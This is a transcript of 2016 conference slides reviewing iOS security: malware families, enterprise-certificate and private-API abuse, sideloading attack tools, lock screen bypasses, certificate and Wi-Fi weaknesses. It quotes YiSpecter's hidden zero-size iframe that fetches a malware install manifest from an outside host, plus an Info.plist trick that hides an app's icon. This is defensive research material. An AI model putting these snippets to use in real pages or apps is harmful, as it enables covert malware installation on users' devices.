A Retrospective Security Review of Apple's Mobile ... · PDF fileA Retrospective Security...

2016 © Dino Security S.L. All rights reserved. Todos los derechos reservados.

A Retrospective Security Review of Apple’s Mobile Ecosystem

www.blackhatsessions.com

Raúl SilesFounder & Senior Security [email protected] 23, 2016

w w w. d i nos e c . c om@ di nos e c

22016 © Dino Security S.L. www.dinosec.comAll rights reserved. Todos los derechos reservados.

"iOS is considered to be by many in the industry one of the most secure mobile platforms"


Outline

• iOS State-of-the-Art• Malware• Developers• Lock Screen• Digital Certificates• Software Updates• Wi-Fi• Conclusions


iOS State-of-the-Art


Market Share: Mobile Devices

Q2 2015:Android: 82.8%iOS: 13.9%WP: 2.6%BB: 0.3%Others: 0.4%

Consolidated trend to exceed more than 300 million units by quarter (Qx): 1,3 billions (2014)

Reference: http://www.idc.com/prodserv/smartphone-os-market-share.jsp


iOS Version Adoption(March 2016)

https://developer.apple.com/support/app-store/https://mixpanel.com/trends/#report/ios_9

https://david-smith.org/iosversionstats/


• iOS after 10 years…– 2007: iPhone 2G (iOS 1)– 2008: iPhone 3G (iOS 2)– 2009: iPhone 3GS (iOS 3)– 2010: iPhone 4 (iOS 4) + iPad 1– 2011: iPhone 4S (iOS 5) + iPad 2– 2012: iPhone 5 (iOS 6) + iPad 3 & 4 & mini– 2013: iPhone 5c & 5s (iOS 7) + iPad air & mini 2– 2014: iPhone 6 & 6+ (iOS 8) + iPad air 2 & mini 3– 2015: iPhone 6S & 6S+ (iOS 9) + iPad Pro 12,9" & mini 4

• Apple Watch & Apple Pencil

– 2016: iPhone SE + iPad Pro 9.7" (… iOS 10)

Security By (CVE) Numbers

7

Official numbers:

• iOS 9: 101• iOS 9.0.1: -• iOS 9.0.2: 1• iOS 9.1: 49• iOS 9.2: 50• iOS 9.2.1: 13• iOS 9.3: 39• iOS 9.3.1: -• iOS 9.3.2: 39

iOS 9.x: 292

Official numbers:

• iOS 8: 56 • iOS 8.1: 5• iOS 8.1.1: 9• iOS 8.1.2: -• iOS 8.1.3: 34• iOS 8.2: 6• iOS 8.3: 58• iOS 8.4: 33• iOS 8.4.1: 71

iOS 8.x: 272

Official numbers:

• iOS 6: 197• iOS 7: 80• iOS 7.1: 41• …

Official numbers:

• wOS 1.0.1: 13• wOS 2.0: 39• wOS 2.0.1: 14• wOS 2.1: 30• wOS 2.2: 34• wOS 2.2.1: 26

wOS x.y: 156


Malware?


"If it has no name, it does not exist!"

How do we identify or classify malware families and specimens if there are no anti-virus (or anti-malware) solutions for iOS?– Malware (CME)– Vulnerabilities (CVE)


Recent iOS Malware Trends (1/2)

• “No iOS Zone” (DoS) – Malicious SSL certificates (iOS < 8.3) (Apr'15)– https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/– WiFiGate: https://www.skycure.com/blog/wifigate-how-mobile-carriers-expose-us-to-wi-fi-attacks/

• XARA: Unauthorized Cross-App Resource Access on MAC OS X and iOS (Jun'15)– https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view?pli=1– http://www.imore.com/depth-look-ios-os-x-xara-vulnerabilities

• KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts (Aug'15)– http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-

to-create-free-app-utopia/ (for jailbroken devices)• Masque attack(s)…

– "Masque Attack: All Your iOS Apps Belong to Us" (Nov'14)• https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html

– Wirelurker (Nov'14): http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/– "iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking" (Feb'15)

• https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html– "Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking" (Jun'15)

• https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

10


Recent iOS Malware Trends (2/2)

• …More masque attack(s)– "iOS Masque Attack Weaponized: A Real World Look" (Aug'15)

• https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html• XcodeGhost (Sep'15 & Nov'15)

– http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/

– https://blog.lookout.com/blog/2015/09/20/xcodeghost/– https://blog.lookout.com/blog/2015/09/21/xcodeghost-apps– https://blog.lookout.com/blog/2015/09/22/xcodeghost-detection/– https://www.fireeye.com/blog/threat-research/2015/11/xcodeghost_s_a_new.html

• ZergHelper: Pirated iOS App Store’s Client (…) Evaded Apple iOS Code Review (Feb'16)– http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-

ios-code-review/• AceDeceiver: iOS Trojan Exploiting Apple DRM Design Flaws (…) (Mar'16)

– http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-exploiting-apple-drm-design-flaws-to-infect-any-ios-device/

11


iOS Malware

• Distributing Apps Out of the App Store• Abusing Apple Private APIs


Distributing Apps Out of the App Store

• Apple Developer Enterprise Program (vs. Apple Developer Program)– https://developer.apple.com/programs/enterprise/ ($299/year)

• Provision iOS apps for internal corporate distribution (in-house)– Enterprise certs and profiles can "only" be used for internal distribution– Technically, they can be used to install any app on any device

• Violating Apple's Developer Enterprise Program terms of service– Avoid Apple's App Store vetting process

• And it allows the usage of Apple private APIs (sensitive operations)

• User must accept the app installation (two taps)– In iOS 9 it is required to manually trust the developer (provisioning profile)

13

http://johannesluderschmidt.de/provision-ios-ipa-app-for-in-house-enterprise-distribution/


"Two taps to rule them all"


Apple Developer Enterprise Distribution Requirements

• Become an Apple enterprise "developer": $299/year• Generate a certificate to distribute iOS apps• Create a provisioning profile• Create the iOS app IPA file & associated Manifest file (PLIST)• Create an "itms-services" web link pointing to the Manifest

– The Manifest file includes the reference to the IPA file (app)• Own a web server with a valid trusted certificate (HTTPS)• Distribute the web link: E.g. Tweet, web page, e-mail, Google dork, etc.

– Real benign distribution cases in Spain and China

<a href="itms-services://?action=download-manifest&url=https:// www.dinosec.com/dist/app/manifest.plist">Install this app!</a>


Distributing Apps Out of the App Store: iOS 8 & 9


Abusing Apple Private APIs (1/2)

• Objective-C– Message dispatch mechanism to invoke method/function calls– objc_msgSend (String parameters)

• Class name and method name• Not resolved statically, but at runtime (or execution time)

– Obfuscated and/or encrypted

– Load a library (dlopen) and access a function (dlsym)• Runtime (or NSClassFromString/NSSelectorFromString)

• Apple's App Store review or vetting process– Private APIs accessing sensitive user information


Abusing Apple Private APIs (2/2)

• "iRiS: Vetting Private API Abuse in iOS Applications" (Oct 2015)– Dynamic analysis of API calls that cannot be resolved statically ("suspicious")– 2,019 apps analyzed: 146 (7%) make use of 150 private APIs (25 critical)

• SourceDNA (Oct 2015) – Using the methods described in the previous slide…– 256 apps affected (+1 million downloads)– Youmi's Ad SDK (obfuscated binary ad library)

• It sends user info to a server in China– List of installed apps, current running being, serial number,

hardware components (peripherals), "e-mail" Apple ID…

http://www.cse.buffalo.edu/~mohaisen/classes/fall2015/cse709/docs/deng-ccs15.pdfhttps://sourcedna.com/blog/20151018/ios-apps-using-private-apis.html


YiSpecter (Oct 5, 2015)

• Distributed through an Apple Enterprise Developer certificate– Evades Apple's App Store vetting process– Targets both jailbroken and non-jailbroken iOS devices

• Extensive usage of private APIs– MobileInstallation: local app (.ipa file) install & uninstall capabilities– Claims the following private entitlement key used by iOS system apps

• com.apple.private.mobileinstall.allowedSPI

– Monitor currently open app and displays advertisements• SpringBoardServices: SBSCopyFrontmostApplicationDisplayIdentifier• SpringBoardServices: SBSLaunchApplicationWithIdentifier

– Obtains the list of installed apps: MobileInstallationLookup– Mobile Safari manipulation: default search engine, bookmarks, etc.

19

http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

<iframe src="itms-services://?action=download-manifest& url=https://qvod.bb800.com/assets/upload/3794.plist" height=0 width=0></frame>


Abusing Apple iOS System Features

• Suppress the presence of the app icon from SpringBoard– Makes it harder to remove the app / malware (e.g. YiSpecter)

• Alternative: Reset the iOS device to factory defaults

• Info.plist file– Declares the properties & app– Undocumented feature

• Supress SpringBoard from displaying the installed app icon

• Intented for Apple's system apps without UI components

– Deprecated as of iOS 8.3• iOS 8: com.apple.*

<dict> ...<key>CFBundleDisplayName</key><string>Passbook</string><key>CFBundleExecutable</key><string>NoIcon</string><key>CFBundleIdentifier</key><string>com.weiying.hiddenIconLaunch</string><key>CFBundleShortVersionString</key><string>2.3.0</string>...<key>SBAppTags</key><array>

<string>hidden</string></array>

http://www.zdziarski.com/blog/?p=5072


Another way of Temporarily Hiding iOS Apps

• iOS 7, 8 & 9 (9.3.2)– Non-jailbroken iOS devices

• The first SpringBoard pane (homescreen) and the dock must be completely full of apps– App to hidde must go into another app, to create a folder, and into the dock

at the end• Hidden apps are still accessible from Spotlight search

– Hidden apps are still visible from Settings – General – Storage & iCloud Usage – [Storage] Manage Storage – (List of installed apps)

• Hidden apps are restored after the iOS device rebootshttps://www.youtube.com/watch?v=NlA-B_98K78


Temporarily Hiding iOS Apps


Developers


"Is this a bug or a feature?"


– Apps in the App Store (from 500 to 2M in 8 years)– Downloaded 130,000,000,000 times

– Registered developers– 2 million registered in the last year alone

• Anything strange here?

• San Francisco, June 13-17, 2017• 2,000,000

• 13,000,000

What Is This?


Developing for the Apple Mobile Ecosystem

• Apple developer membership options– Individual: Free or Apple Developer Program ($99/year)– Organization: Apple Developer (Enterprise) Program ($99 or $299/year)

• Prior to Xcode 7 (Sep 2015)– Rigorous control over the iOS developer community (regulated market)

• After Xcode 7: iOS app sideloading– A free Apple ID is all you need to start running any code on iOS devices

• No Apple ID extensive checks: anonymity via fake Apple IDs (e-mails)• A malware developer just needs physical access to an iOS device (USB connection)• Install, or even replace legitimate, iOS apps with malicious ones…

https://www.mi3security.com/why-2016-may-be-the-year-of-ios-malware/


iOS App Sideloading


Advanced App Capabilities

https://developer.apple.com/support/app-capabilities/


Su-A-Cyder (1/2)

• Toolset or framework to generate trojanized iOS apps / malware– Take a decrypted iOS app, inject it with evil code, resign the app with any Apple ID, and

install the repackaged app on any non-jailbroken iOS device– Home-Brewed iOS Malware PoC Generator (BlackHat ASIA 2016)

• http://blackhat.com/asia-16/briefings.html#su-a-cyder-homebrewing-malware-for-ios-like-a-b0$$– Threat or attack vector (not a vulnerability, and not malware)

• User must accept app installation prompt– Unlocked iOS device

• Full access to most data within the trojanized app– Corporate credentials, VPN access, healthcare records, etc.– Location info (GPS or EXIF), address book, calendar, Health Kit, etc.

https://www.mi3security.com/su-a-cyder-ios-malware/


Su-A-Cyder (2/2)

• Based on open-source tools• Cydia, Theos(-jailed), libimobiledevice, insert_dylib & Spaceship/Fastlane

– By Mi3 Security (Chilik Tamir)

• Evil .dylib (no need for original source code) - E.g. Cycript• Provisioning profile (Apple ID)

• Untrusted developer – Verify the developer app certificate is trusted on target iOS device– Settings – General – Device Management: Developer App (by Apple ID)– Trust "Apple ID" (developer)– Verify App via network connection for a specific iOS device (& Delete Apps)

https://github.com/Mi3Security/su-a-cyder


Su-A-Cyder: Skype

Based on: https://www.youtube.com/watch?v=oscx8AC0qUI


SandJacking

• Su-a-cyder app upgrades fixed by Apple in iOS 8.3 – Install process denies app upgrades with mismatched app ID (bundle ID)

• Alternative attack vector for iOS 8.3+– Backup device– Delete legitimate app– Install evil app– Restore backup over the evil app

• HITB (May 2016) by Mi3 Security (Chilik Tamir)– PoC tool, SandJacker, not released util it is fixed by Apple

https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Chilik%20Tamir%20-%20Profiting%20from%20iOS%20Malware.pdf


SideStepper

• Attack vector targeting enterprise MDM solution and iOS devices– Allows installing malicious apps in non-jailbroken iOS devices– iOS 9 or greater

• Install malicious iOS configuration profile to perform MITM attacks– Hijack communications between iOS device and MDM solution (VPN or proxy)

• When combined with a rogue alternate enterprise app store, it facilitates the installation of additional (potentially malicious) apps– Bypass centralized Apple's App Store verification and distribution process– Hijack any MDM command and replace it by a request to install a malicious app– iOS natively trusts any (enterprise) app installed by MDM solutions, not showing any

indication of its origin (vs. the tedious iOS 9 trust enterprise app installation process)

https://www.checkpoint.com/resources/sidestepper-ios-vulnerability/


• Jailbroken iOS device– iOS version? Vulnerable to jailbreak? Local or remote? 0-day?

• Non-jailbroken iOS device– App Store

• All code must be signed by an identified developer + Apple's review or vetting process• Malware in the official App Store

– Coin your own definition of mobile malware: WhatsApp, Linked-In…– LBTM, InstaStock, FindAndCall, Jekyll, FakeTor, XcodeGhost, InstaAgent, abusing private APIs (e.g.

Youmi's Ad SDK), ZergHelper, AceDeceiver (Apple's DRM flaws: FairPlay)

– Out of the App Store• Abuse private APIs (out of Apple's App Store review process)• Remote: Abusing Apple Enterprise Developer Certificates

– Third-party app stores: vShare, 25PP, Kuaiyong, 7659, etc.– Malicious apps: FinFisher, Pangu, Masque Attack, WireLurker, Hacking Team, Oneclickfraud, YiSpecter…

• Local: Sideloading iOS apps in Xcode 7– Su-a-Cyder and SandJacker

• MDM: SideStepper

iOS Malicious Apps Distribution Vectors


Digging in the Old Trunk iOS 9.3.2


Lock Screen


"Voice Hacking"


Bypassing iOS Lock Screen History

• Between 2011-2016…– iOS 5.x: 4 vulnerabilities– iOS 6.x: 8 vulnerabilities– iOS 7.x: 12 vulnerabilities– iOS 8.x: 11 vulnerabilities – iOS 9.x: 6 vulnerabilities (up to now, iOS 9.3.2…)

• Smartcover, SIM card, Control Center, Notifications Center, Siri…• Temporary unauthorized physical access to device

– Just a few seconds (or minutes)

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html

Updated with everysingle iOS version

since Sep 2014

2011


Bypassing iOS Lock Screen Via Siri

New iOS version released just to fix one of these bugs:

iOS 9.0.2 (CVE-2015-5923)


Digital Certificates


"If there is no CVE, there is no vulnerability"

“Today, I’m proud to say that at the end of 2016, App Transport Security (ATS) is becoming a requirement for App Store apps” Apple’s head of security engineering and architecture, Ivan KrsticWWDC 2016


"Continue" or "Details – Trust"

What Is This?

The double button of mass destruction!!


(Un)Manageable Digital Certificates

• Mobile Safari• iOS will never ask the user about that certificate again…

– Never ever! (iOS 9.3.2)• Settings – Safari: "Clear History and Website Data" does not help• Even after rebooting the iOS device…

– Fake: Since iOS 7 • In previous iOS versions (e.g. 5.1.1): Settings – Safari and selecting

"Clear Cookies and Data" (and/or rebooting) does not help!

< 2012 ?


Diggesting Digital Certificates


Managing Digital Certificates?

• Alternatively, before connecting to any website via Mobile Safari, install self-signed certs as configuration profiles– Settings – General – Profiles

• Delete the "offending" cert by…– … "Never use a cannon to kill a fly" (Confucius)– Removing all settings (or, at least, all network settings)…

• Settings – General – Reset – Reset All Settings• Settings – General – Reset – Reset Network Settings

• Configuration profile (MDM)– Security & Privacy: "Accept untrusted TLS certificates"


Software Updates


"Once a vulnerability gets a CVE assigned, and the vendor says it has been fixed… you don't

need to worry anymore, right?"


iOS & WatchOS Software Updates

• "iOS - Back to the Future" (March 2014) & "II" (December 2014)– Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2014iOS

• iOS: Settings – General – Software Update– http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdate/

com_apple_MobileAsset_SoftwareUpdate.xml– http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdateDocumentation/

com_apple_MobileAsset_SoftwareUpdateDocumentation.xml

• watchOS: Watch app – General – Software Update – http://mesu.apple.com/assets/watch/com_apple_MobileAsset_SoftwareUpdate/

com_apple_MobileAsset_SoftwareUpdate.xml– http://mesu.apple.com/assets/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation/

com_apple_MobileAsset_WatchSoftwareUpdateDocumentation.xml

2014


iOS & watchOS Update Freeze

Video recorded on June 20, 2016 Latest versions available:

iOS 9.3.2watchOS 2.1.1


Wi-Fi


"What vulnerabilities get a CVE assigned to them?"

"The ones that are really critical!"


Really Critical CVE J

• "Wi-Fi: Why iOS (Android & others) Fail inexplicably" (March 2013)– Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi

• iOS 8.3 (April 8, 2015)– Probably you can get a CVE assigned to you too if you paid attention…

https://support.apple.com/en-us/HT204661

radius.dinosec.com

2013


A Not So Critical (Inexistent) CVE L

• "Wi-Fi: Why iOS (Android & others) Fail inexplicably" (March 2013)– Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi

• Wi-Fi WPA(2)/Enterprise attacks (No CVE assigned: it's a feature, not a bug…)

Find thedifferences?


Wi-Fi Enterprise Networks: Set-Up


Wi-Fi Enterprise Networks: First Time


Wi-Fi Enterprise Networks: Next Times


Conclusions


Spanish Collection of Proverbs

"An apple a day keeps the intruder

away"


Questions?

w w w. d i nos e c . c om@ di nos e c

Ra ú l S i l e sr a u l @ di nos e c . c om

A Retrospective Security Review of Apple's Mobile ... · PDF fileA Retrospective Security...

Documents

Transcript of A Retrospective Security Review of Apple's Mobile ... · PDF fileA Retrospective Security...